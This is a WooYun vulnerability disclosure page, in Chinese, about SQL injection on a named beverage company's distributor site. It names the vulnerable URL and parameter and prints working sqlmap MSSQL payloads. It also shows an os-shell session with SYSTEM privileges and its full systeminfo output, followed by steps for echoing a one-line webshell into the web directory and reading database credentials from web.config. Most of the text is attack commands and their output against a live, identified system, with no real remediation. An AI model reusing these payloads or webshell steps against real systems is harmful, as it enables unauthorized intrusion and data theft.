当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107702

漏洞标题:某饮料品牌网站存在SQL注入可上传webshell

相关厂商:今麦郎饮品

漏洞作者: TT向上

提交时间:2015-04-15 18:53

修复时间:2015-05-30 18:54

公开时间:2015-05-30 18:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某饮料品牌网站存在SQL注入可上传webshell,查看大量数据库数据。

详细说明:

某饮料品牌网站存在SQL注入可上传webshell,查看大量数据库数据。

11.jpg


22.jpg

漏洞证明:

http://www.jmlyp.com/
今麦郎饮品股份有限公司-》系统管理-》用友软件。
进入http://drp.jmlyp.com/ [TMS客户通路编号查询]功能存在SQL注入
http://drp.jmlyp.com/area/customer.asp 搜索框输入:'--可查询所有信息
如图:

3.jpg


放入sqlmap

Parameter: cusName (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cusName=1%' AND 7132=7132 AND '%'='
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: cusName=1%' AND 7953=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7953=7953) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(120)+CHAR(113))) AND '%'='
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: cusName=1%' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(122)+CHAR(118)+CHAR(113)+CHAR(108)+CHAR(105)+CHAR(102)+CHAR(86)+CHAR(81)+CHAR(81)+CHAR(98)+CHAR(113)+CHAR(90)+CHAR(82)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(120)+CHAR(113)-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: cusName=1%'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: cusName=1%' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [22]:
[*] app1
[*] app10
[*] app11
[*] app2
[*] app3
[*] app4
[*] app5
[*] app6
[*] app7
[*] app8
[*] master
[*] model
[*] model_1
[*] msdb
[*] ReportServer$U8SQL
[*] ReportServer$U8SQLTempDB
[*] tempdb
[*] U8DRP_DataBase
[*] U8DRP_EntData
[*] U8DRP_ReportMeta
[*] U8DRP_Template
[*] U8DRP_TempQuery


由于是MSSQL 2005 直接用--os-shell参数试试,发现可用

os-shell> systeminfo
[21:40:48] [INFO] adjusting time delay to 1 second due to good response times
[21:40:49] [INFO] the SQL query used returns 49 entries
[21:40:49] [INFO] retrieved:
[21:40:49] [INFO] retrieved: 主机名:           ODBDRP
[21:40:49] [INFO] retrieved: OS 名称:          Microsoft(R) Windows(R) Server 2.
..
[21:40:49] [INFO] retrieved: OS 版本:          5.2.3790 Service Pack 1 Build 379
0
[21:40:49] [INFO] retrieved: OS 制造商:        Microsoft Corporation
[21:40:49] [INFO] retrieved: OS 配置:          独立服务器
[21:40:49] [INFO] retrieved: OS 构件类型:      Multiprocessor Free
[21:40:49] [INFO] retrieved: 注册的所有人:     Ken
[21:40:49] [INFO] retrieved: 注册的组织:
[21:40:49] [INFO] retrieved: 产品 ID:          69813-640-0394874-45064
[21:40:49] [INFO] retrieved: 初始安装日期:     2012-4-7, 21:01:40
[21:40:49] [INFO] retrieved: 系统启动时间:     2 天 19 小时 37 分 56 秒
[21:40:49] [INFO] retrieved: 系统制造商:       Dell Inc.
[21:40:49] [INFO] retrieved: 系统型号:         PowerEdge 2950
[21:40:49] [INFO] retrieved: 系统类型:         X86-based PC
[21:40:49] [INFO] retrieved: 处理器:           安装了 8 个处理器。
[21:40:49] [INFO] retrieved:                   [01]: x86 Family 6 Model 15 St...
[21:40:49] [INFO] retrieved:                   [02]: x86 Family 6 Model 15 St...
[21:40:49] [INFO] retrieved:                   [03]: x86 Family 6 Model 15 St...
[21:40:49] [INFO] retrieved:                   [04]: x86 Family 6 Model 15 St...
[21:40:50] [INFO] retrieved:                   [05]: x86 Family 6 Model 15 St...
[21:40:50] [INFO] retrieved:                   [06]: x86 Family 6 Model 15 St...
[21:40:50] [INFO] retrieved:                   [07]: x86 Family 6 Model 15 St...
[21:40:50] [INFO] retrieved:                   [08]: x86 Family 6 Model 15 St...
[21:40:50] [INFO] retrieved: BIOS 版本:        DELL   - 1
[21:40:50] [INFO] retrieved: Windows 目录:     C:\\\\WINDOWS
[21:40:50] [INFO] retrieved: 系统目录:         C:\\\\WINDOWS\\\\system32
[21:40:50] [INFO] retrieved: 启动设备:         \\\\Device\\\\HarddiskVolume1
[21:40:50] [INFO] retrieved: 系统区域设置:     zh-cn;中文(中国)
[21:40:50] [INFO] retrieved: 输入法区域设置:   zh-cn;中文(中国)
[21:40:50] [INFO] retrieved: 时区:             (GMT+08:00) 北京,重庆,香港特别
行政区,乌鲁木齐
[21:40:50] [INFO] retrieved: 物理内存总量:     16,383 MB
[21:40:50] [INFO] retrieved: 可用的物理内存:   2,142 MB
[21:40:50] [INFO] retrieved: 页面文件: 最大值: 1,794 MB
[21:40:50] [INFO] retrieved: 页面文件: 可用:   3,727 MB
[21:40:50] [INFO] retrieved: 页面文件: 使用中: 18,446,744,073,709,549,683 MB
[21:40:50] [INFO] retrieved: 页面文件位置:     C:\\\\pagefile.sys
[21:40:50] [INFO] retrieved: 域:               WORKGROUP
[21:40:50] [INFO] retrieved: 登录服务器:       暂缺
[21:40:50] [INFO] retrieved: 修补程序:         安装了 3 个修补程序。
[21:40:50] [INFO] retrieved:                   [01]: File 1
[21:40:50] [INFO] retrieved:                   [02]: Q147222
[21:40:51] [INFO] retrieved:                   [03]: KB943545 - Update
[21:40:51] [INFO] retrieved: 网卡:             安装了 1 个 NIC。
[21:40:51] [INFO] retrieved:                   [01]: Broadcom BCM5708C NetXtr...
[21:40:51] [INFO] retrieved:                       连接名:      本地连接
[21:40:51] [INFO] retrieved:                       启用 DHCP:   否
[21:40:51] [INFO] retrieved:                       IP 地址
[21:40:51] [INFO] retrieved:                       [01]: 192.168.55.12
command standard output:
---
主机名:           ODBDRP
OS 名称:          Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本:          5.2.3790 Service Pack 1 Build 3790
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     Ken
注册的组织:
产品 ID:          69813-640-0394874-45064
初始安装日期:     2012-4-7, 21:01:40
系统启动时间:     2 天 19 小时 37 分 56 秒
系统制造商:       Dell Inc.
系统型号:         PowerEdge 2950
系统类型:         X86-based PC
处理器:           安装了 8 个处理器。
                  [01]: x86 Family 6 Model 15 Stepping 7 GenuineIntel ~2327 Mhz
                  [02]: x86 Family 6 Model 15 Stepping 7 GenuineIntel ~2327 Mhz
                  [03]: x86 Family 6 Model 15 Stepping 7 GenuineIntel ~2327 Mhz
                  [04]: x86 Family 6 Model 15 Stepping 7 GenuineIntel ~2327 Mhz
                  [05]: x86 Family 6 Model 15 Stepping 7 GenuineIntel ~2327 Mhz
                  [06]: x86 Family 6 Model 15 Stepping 7 GenuineIntel ~2327 Mhz
                  [07]: x86 Family 6 Model 15 Stepping 7 GenuineIntel ~2327 Mhz
                  [08]: x86 Family 6 Model 15 Stepping 7 GenuineIntel ~2327 Mhz
BIOS 版本:        DELL   - 1
Windows 目录:     C:\WINDOWS
系统目录:         C:\WINDOWS\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     16,383 MB
可用的物理内存:   2,142 MB
页面文件: 最大值: 1,794 MB
页面文件: 可用:   3,727 MB
页面文件: 使用中: 18,446,744,073,709,549,683 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 3 个修补程序。
                  [01]: File 1
                  [02]: Q147222
                  [03]: KB943545 - Update
网卡:             安装了 1 个 NIC。
                  [01]: Broadcom BCM5708C NetXtreme II GigE (NDIS VBD Client)
                      连接名:      本地连接
                      启用 DHCP:   否
                      IP 地址
                      [01]: 192.168.55.12


system权限,直接echo写入一句话
先使用os-shell> dir /s /x d:\*customer.asp
查找customer.asp文件所在位置,然后echo一句话到customer.asp目录下。使用菜刀链接即可。

1.jpg


通过查看webconfig文件配看到数据库配置,然后链接数据库

2.jpg


OVER

修复方案:

升级加固,查马查后门,你们更专业。

版权声明:转载请注明来源 TT向上@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝